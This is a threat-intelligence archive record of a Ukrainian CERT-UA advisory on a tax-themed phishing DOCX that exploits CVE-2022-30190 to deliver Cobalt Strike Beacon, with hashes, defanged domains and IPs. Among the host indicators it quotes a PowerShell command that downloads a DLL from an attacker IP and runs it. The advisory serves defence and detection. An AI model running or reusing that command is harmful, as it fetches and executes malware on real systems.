{
	"id": "0f7f42f9-379d-4c60-84f4-9849b7b5b3bd",
	"created_at": "2026-04-06T00:11:52.848006Z",
	"updated_at": "2026-04-10T03:24:24.796002Z",
	"deleted_at": null,
	"sha1_hash": "997012d75e97cc714c2bf1923d1d578d816885d5",
	"title": "CERT-UA",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1673148,
	"plain_text": "CERT-UA\r\nArchived: 2026-04-05 15:32:32 UTC\r\nЗагальна інформація\r\nВиявлено шкідливий документ \"Накладення штрафних санкцій.docx\" відкриття якого призведе до\r\nзавантаження HTML-файлу та виконання JavaScript-коду (CVE-2022-30190), який забезпечить\r\nзавантаження та запуск шкідливої програми Cobalt Strike Beacon (дата компіляції: 16.06.2022).\r\nУ взаємодії з суб'єктом координації з'ясовано, що згаданий DOCX-документ містився в захищеному\r\nпаролем архіві \"НакладенняШтрафнихСанкцiй.zip\", який, в свою чергу, розповсюджувався засобами\r\nелектронної пошти, начебто, від імені \"Державної податкової служби України\" (тема листа: \"Повідомлення\r\nпро несплату податку\").\r\nАктивність має персистентний характер та відстежується за ідентифікатором UAC-0098. \r\nІндикатори компрометації\r\nФайли:\r\n37c7b934661f31e526ffb31f7c935d5a  7d53782fab972b8b70c6c7134598da25fd125c58c88a6d468464cee6c9dbe764\r\na3f3402656fc5be4439899b2a5f25eb6  bc6898f0e66582ab92307809a409797749b49948fc265767579b224755b0a17b\r\n85851e09b368ebba90f5d922cd77f348  02b77a482120b7997f06da67f33cdb286ab06b7ef1bd9dfb2ad77a634595abfe\r\n52f371a4f06f3398a5a361335920618c  394cbab9eb87ef8ee795d184137ac2634b22a0a3e642534a55c1623a813c8a59\r\nМережеві:\r\nrostyslav.nal0g@gmail[.]com\r\nhXXp://64[.]190.113.51:8000/index[.]html\r\nhXXp://5[.]199.173.152/ked[.]dll\r\nhXXps://baidenfree[.]com/jquery-3.3.1.min.js\r\nbaidenfree[.]com\r\ngolgba[.]com\r\ndomtern[.]com\r\njorgava[.]com\r\n185[.]143.223.29 (Received)\r\n64[.]190.113.51\r\n5[.]199.173.152\r\n5[.]199.174.219\r\n185[.]170.144.159\r\n87[.]251.64.5\r\n185[.]170.144.158\r\nhttps://cert.gov.ua/article/339662\r\nPage 1 of 2\n\nХостові:\r\nInvoke-WebRequest -Uri 'http://5.199.173.152/ked.dll' -OutFile 'c:\\windows\\tasks\\ked.dll'; start-proc\r\nC:\\windows\\tasks\\ked.dll\r\nГрафічні зображення\r\nSource: https://cert.gov.ua/article/339662\r\nhttps://cert.gov.ua/article/339662\r\nPage 2 of 2",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://cert.gov.ua/article/339662"
	],
	"report_names": [
		"339662"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434312,
	"ts_updated_at": 1775791464,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/997012d75e97cc714c2bf1923d1d578d816885d5.pdf",
		"text": "https://archive.orkl.eu/997012d75e97cc714c2bf1923d1d578d816885d5.txt",
		"img": "https://archive.orkl.eu/997012d75e97cc714c2bf1923d1d578d816885d5.jpg"
	}
}